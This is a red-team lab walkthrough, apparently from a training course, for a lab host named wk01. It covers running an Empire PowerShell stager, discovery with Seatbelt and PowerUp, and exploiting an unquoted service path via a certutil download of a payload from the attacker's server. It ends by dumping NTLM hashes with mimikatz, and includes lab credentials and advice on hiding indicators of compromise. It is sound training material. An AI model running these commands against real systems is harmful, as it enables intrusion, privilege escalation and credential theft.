Lab 3.3 : Discovery and Escalation
Objectives
- Conduct Host-Based Discovery
- Search for Privilege Escalation
- Escalate to SYSTEM
- Dump Password Hashes
In this lab we will conduct a survey of the target host, we will examine important configurations that may affect our engagement. Once we have deemed that it is safe to operate on this host, we will look for and take advantage of a privilege escalation. Once we have an agent running as SYSTEM we will dump password hashes from the system.
TTPs Emulated in this Lab
- T1082 - System Information Discovery
- T1082 - Account Discovery
- T1082 - Create or Modify System Process: Windows Service
- T1082 - Hijack Execution Flow: Path Interception by Unquoted Path
- T1082 - Process Discovery
- T1082 - Query Registry
Preparation
Preparation Steps
Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.
Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your ip address:
sudo openvpn ~/Desktop/sec565-labs-range.ovpn
Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :
ping -c 4 draconem.io
If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.
curl draconem.io | head

On Your Own
- Create an Empire listener
- Create a PowerShell stager
- Execute the stager to create an agent
- Conduct Host-Based Discovery with Seatbelt
- Review Seatbelt Results
- Privilege Escalation with PowerUp
- Review PowerUp Results
- Create a Windows Service Executable
- Dump Hashes with the Elevated Agent
- Review the walkthrough
Walkthrough
Launch Empire and Starkiller
1. Launch Empire and start an http listener on port 8080 for your tun0 interface. If you run into any issues refer back to Lab 2.1 - C2 Introduction with Empire
Create a PowerShell Stager
2. Create an Empire stager. Click on the suitcase icon
on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.
Select multi/launcher in the drop down menu. Then provide the following values:
- StarkillerName:
interactive-http-pwsh - Listener:
interactive-http - Language:
powershell
Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

Operational Security
3. For the sake of time and to remove barriers, this lab will have you RDP directly to the target system with user credentials discovered in the previous lab. In real engagements you would take the following into consideration.
- RDP will not be accessible directly to workstations
- A redirector must be used
- Interaction with wk01 should go through a pivot, but then outbound connections can be go direct to the redirector
Execute Stager on wk01.draconem.io
4. Deliver your stager to wk01.draconem.io via RDP. Establish an RDP session to the wk01 Windows instance, using the credentials mark.goodwin : C@v3t3Dr@c0n3m!!. We will use xfreerdp on our Slingshot Linux VM with the clipboard plugin so that we can paste our stager into a command prompt. Once you get your agent, exit the RDP session.
xfreerdp +clipboard /u:mark.goodwin /p:'C@v3t3Dr@c0n3m!!' /v:wk01.draconem.corp
On Slingshot, navigate to the Stagers dashboard, click the three vertical dots icon
under actions to bring up the actions menu. Click Copy to Clipboard. Then paste into a command prompt on the Windows system.

Conduct Host-Based Discovery with Seatbelt
5. Once you get your new agent, interact with it and task it to conduct discovery of the host itself. Select csharp/GhostPack/Seatbelt from the Execute Module drop down list. Then enter the following values:
- Command:
-group=all
Then click the SUBMIT button. This task will take some time as the agent queries hundreds of settings to collect as much information as possible. Since you are not an administrative user, some of the sections will state that the information was inaccessible.

Review Seatbelt Results
6. Spend a few minutes reviewing the output. There are some larger sections that you may skim over, but take special note of these sections:
Note
Some text has been removed for readability.
7. The AntiVirus check has failed, in these cases you should consult the process list to identify security products.
====== AntiVirus ======
Cannot enumerate antivirus. root\SecurityCenter2 WMI namespace is not available on Windows Servers
8. The ARPTable section will show relevant network interfaces and the ARP cache. ARP entries are relevant to exploring other systems on the same network segment. ARP cache entries are short lived, the information is usually reliable. The cache may reveal other targets in the same network segment. Meanwhile, the network interfaces are important as you begin to create a network map of the targets and any device that sits on two networks, has multiple adapters, is a valuable target.
====== ARPTable ======
Loopback Pseudo-Interface 1 --- Index 1
Interface Description : Software Loopback Interface 1
Interface IPs : ::1, 127.0.0.1
DNS Servers : fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
Internet Address Physical Address Type
224.0.0.22 00-00-00-00-00-00 Static
Ethernet 2 --- Index 5
Interface Description : Amazon Elastic Network Adapter
Interface IPs : fe80::864:93a5:f43b:6eb8%5, 10.130.2.20
DNS Servers : 10.130.5.40
Internet Address Physical Address Type
10.130.2.1 0A-EE-4E-F8-67-54 Dynamic
10.130.2.255 FF-FF-FF-FF-FF-FF Static
169.254.169.254 0A-EE-4E-F8-67-54 Dynamic
224.0.0.22 01-00-5E-00-00-16 Static
224.0.0.251 01-00-5E-00-00-FB Static
224.0.0.252 01-00-5E-00-00-FC Static
255.255.255.255 FF-FF-FF-FF-FF-FF Static
9. The DNSCache should direct you to the DNS servers in the network.
====== DNSCache ======
Entry : dc01.draconem.corp
Name : dc01.draconem.corp
Data : 10.130.5.40
Entry : dc02.draconem.corp
Name : dc02.draconem.corp
Data : 10.130.5.41
10. The DotNet section will show the latest version of .NET and CLR, this information is relevant for the csharp tools that leverage .NET. Also in the section is the status of AMSI which can be detrimental to our use of scripting languages.
====== DotNet ======
Installed CLR Versions
4.0.30319
Installed .NET Versions
4.8.03761
Anti-Malware Scan Interface (AMSI)
OS supports AMSI : True
.NET version support AMSI : True
[!] The highest .NET version is enrolled in AMSI!
11. The InterestingProcesses section should indicate processes like security products as well as other indicators that stand out. Can you spot your agent?
====== InterestingProcesses ======
Category : defensive
Name : MsMpEng.exe
Product : Windows Defender AV
ProcessID : 2664
Owner :
CommandLine :
Category : interesting
Name : powershell.exe
Product : PowerShell host process
ProcessID : 5372
Owner : DRACONEM\mark.goodwin
CommandLine : "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Category : interesting
Name : powershell.exe
Product : PowerShell host process
ProcessID : 852
Owner : DRACONEM\mark.goodwin
CommandLine : "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAUwBpAE8AbgBUAGEAYgBMAEUALgBQAFMAVgBFAHIAcwBpAE8AbgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwA
... truncated ...
AGkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
12. The WindowsDefender section will identify it's current settings.
====== WindowsDefender ======
Locally-defined Settings:
GPO-defined Settings:
13. The WindowsEventForwarding section will indicate if event logs are being centralized elsewhere on the network.
====== WindowsEventForwarding ======
14. Lastly, the WindowsFirewall section should be of particular interest as the rest of the computers on the domain should have similar settings. Take these into consideration as you propagate through the network.
====== WindowsFirewall ======
Collecting Windows Firewall Non-standard Rules
Location : SOFTWARE\Policies\Microsoft\WindowsFirewall
Location : SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Domain Profile
Enabled : False
DisableNotifications : True
DefaultInboundAction : ALLOW
DefaultOutboundAction : ALLOW
Public Profile
Enabled : False
DisableNotifications : True
DefaultInboundAction : ALLOW
DefaultOutboundAction : ALLOW
Standard Profile
Enabled : False
DisableNotifications : True
DefaultInboundAction : ALLOW
DefaultOutboundAction : ALLOW
These are just a few of the sections, spend time reading all the tool output to understand what was checked and why.
Privilege Escalation with PowerUp
15. Now we will look for opportunities to escalate privileges. Interact with your agent, select powershell/privesc/powerup/allchecks from the Execute Module drop down list. Then click the SUBMIT button. This task will take some time as the agent queries hundreds of settings to collect as much information as possible.

Review PowerUp Results
16. Spend a few minutes reviewing the output. There are some larger sections that you can skim over. Take special note of the following sections:
Note
Some text has been removed for readability.
17. We've already hit the jackpot with an unquoted service path for the SalesFarce service.
[*] Checking for unquoted service paths...
ServiceName : SalesFarce
Path : C:\SalesFarce\Sales Farce.exe
ModifiablePath : @{ModifiablePath=C:\SalesFarce; IdentityReference=BUILTIN\Users;
Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'SalesFarce' -Path <HijackPath>
CanRestart : False
ServiceName : SalesFarce
Path : C:\SalesFarce\Sales Farce.exe
ModifiablePath : @{ModifiablePath=C:\SalesFarce; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'SalesFarce' -Path <HijackPath>
CanRestart : False
18. PowerUp also found a reference to a dll that is in a writable folder that does not exist. With some analysis this may be useful, but unfortunately, in this case it's under the current user that does not have administrative rights.
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath : C:\Users\mark.goodwin\AppData\Local\Microsoft\WindowsApps
IdentityReference : DRACONEM\Mark.Goodwin
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\mark.goodwin\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\mark.goodwin\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
Create a Windows Service Binary
19. The next attack will take a bit of set up. Understand that there is a difference between a standard binary and a service binary. While we can easily generate a binary from Empire, we need a binary that will respond appropriately to the queries from the Windows Service Control Manager (SCM), otherwise the new process will be killed. If we generated an exe named Sales.exe, placed it in the original service's folder, and then restarted the service, our agent would only live for a few seconds before SCM kills the process. One option is to compile our own service binary using Visual Studio, another option is to use PowerUp's tools. Unfortunately, the module with this version of Empire is not functioning properly, but this gives us an opportunity to find a workaround!
We are using RDP into our wk01 instance, download PowerUp, then compile a service binary for our privilege escalation. Obviously you would not do this in a real red team operation, we would do this on an offline target. We are doing the best of both worlds here, we are creating the binary on target, but will also show you how to infiltrate the data to the target system as well, as if it was compiled on another system.
xfreerdp +clipboard +drives /u:mark.goodwin /p:'C@v3t3Dr@c0n3m!!' /v:wk01.draconem.corp
Open a command prompt by clicking the windows icon in the lower left and typing cmd.exe. Then run the following commands. You will need to copy paste your PowerShell stager code in the second command. First we use Invoke-WebRequest to pull down the PowerUp PowerShell script. Then we Import-Module and use the Write-ServiceBinary to create a binary, or executable, that will run and respond to SCM appropriately.
cd C:\Users\public\
powershell -c "Invoke-WebRequest -Uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -OutFile PowerUp.ps1"
Warning
Remember to replace the example below with your specific stager code.
powershell -c "Import-Module ./PowerUp.ps1; Write-ServiceBinary -Name SalesFarce -Path ./Sales.exe -Command '<POWERSHELL_STAGERCODE>'"

Serve and Transfer the Payload
20. Create a directory on Slingshot Linux to store and serve your stager.
mkdir -p /tmp/3-3/
cd /tmp/3-3/
Using Windows File Explorer on the RDP connection, copy your new Sales.exe to \\tsclient\media\tmp\3-3.
After the copy is complete, delete it from your C:\Users\public directory on the target system.

21. Now that we have transferred the file from the Windows system to our Slingshot Linux VM, we will serve the executable as a base64 blob from the temporary directory. Switch to Slingshot and run the following:
base64 Sales.exe > Sales.pem
python3 -m http.server 8000
22. Now we will task our agent to use certutil.exe to transfer the base64 blob onto the system. Send these tasks to your agent on the INTERACT page. These shell commands can be chained together but it helps to execute it step-by-step to understand what is happening.
certutil -urlcache -split -f http://10.254.252.3:8000/Sales.pem c:\SalesFarce\sales.pem
Warning
Don't forget to update the IP address in the above command to what your tun0 adapter is currently set to.
certutil -decode c:\SalesFarce\Sales.pem c:\SalesFarce\Sales.exe
del c:\SalesFarce\Sales.pem
net stop SalesFarce
net start SalesFarce
23. Once you get your new elevated agent send this final command from your unprivileged agent to clean up the binaries you placed on the disk.
del c:\SalesFarce\Sales.exe
dir c:\SalesFarce\
Tip
Red Team Tip: It's best to avoid writing files to disk, sometimes it is necessary. In those cases, keep track of those files that will become indicators of compromise. Send the task to delete the files when you don't need them, but always do a directory listing to make sure the file did get deleted.
Dump Hashes with the Elevated Agent
24. Our last task is to use our elevated agent to pull password hashes using mimikatz. Oh no! We have an issue! Navigate to the Agents screen in Starkiller and view your agents. We have a new agent with high integrity running as SYSTEM but it is a 32-bit PowerShell process. Notice the x86 under Architecture. This is due to the fact that the binary we compiled with PowerUp is only 32-bit and there is not a 64-bit option.

If we run mimikatz with this agent, it will fail due to the architecture mismatch. In fact, many of the modules will not function properly with this 32-bit agent. Let's get a 64-bit agent up and then run mimikatz, but first let's explore SysWOW64 and Sysnative.
On 64-bit Windows, the System32 folder holds the 64-bit binaries and the SysWOW64 folder holds the 32-bit binaries. Remember that WOW64 stands for "Windows 32-bit on Windows 64-bit"
- 32-bit (x86) PowerShell is located at %SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
- 64-bit (x64) PowerShell is located at %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe
If we try to reference the 64-bit PowerShell in system32 from our 32-bit agent, the operating system will redirect us back to the 32-bit version in SysWOW64. This is unfortunate in our case because we want a new agent running as SYSTEM and in a 64-bit process. Sysnative to the rescue! A 32-bit process can reference the 64-bit binaries by referencing the C:\Windows\Sysnative folder instead.
Interact with your elevated x86 agent and launch another agent in the INTERACT page. Paste in the stager line with Sysnative and click RUN.
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc <ENCODED_PART_OF_STAGER>
You should now have a new agent that is a 64-bit process running as SYSTEM!

Interact with your new 64-bit agent, select powershell/credentials/mimikatz/logonpasswords from the Execute Module drop down list. Then click the SUBMIT button. This task will take some time. Go to the TASKS page to review the output.
(empireadmin) function Invoke-Mimikatz
{
[CmdletBinding(DefaultParameterSetName="DumpCreds")]
Param(
[Paramete
Hostname: wk01.draconem.corp / authority\system-authority\system
.#####. mimikatz 2.2.0 (x64) #19041 Nov 20 2021 08:28:06
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 614219 (00000000:00095f4b)
Session : RemoteInteractive from 2
User Name : Wesley.Thurner
Domain : DRACONEM
Logon Server : DC01
Logon Time : 5/21/2022 2:50:57 PM
SID : S-1-5-21-3321039121-2384114737-1550575555-1160
msv :
[00000003] Primary
* Username : Wesley.Thurner
* Domain : DRACONEM
* NTLM : aeed91d6297c90d07b0b0d3703d863fe
* SHA1 : 74acca158dd53e17c368037f704886e58366ec8b
* DPAPI : 79f41bf22d848ab26992951c8a762e8e
tspkg :
wdigest :
* Username : Wesley.Thurner
* Domain : DRACONEM
* Password : (null)
kerberos :
* Username : Wesley.Thurner
* Domain : DRACONEM.CORP
* Password : (null)
ssp :
credman :
mimikatz(powershell) # exit
Bye!
25. Click on the key icon
in Starkiller to view the captured credentials.

Conclusion
In this lab we took advantage of our foothold on wk01.draconem.io. First, we had to make sure it was safe to operate. We used Seatbelt to pull a lot of information from the system, we reviewed the results and didn't notice anything particularly risky to our engagement. Then we continued host-based discovery in search of priviledge esclation opportunities with PowerUp. Once we found the unquoted service path we had to jump through a few hoops to take advantage of it. In the end we were able to elevate to SYSTEM and we dumped password hashes! Now we have a new password hash for the user Wesley.Thurner.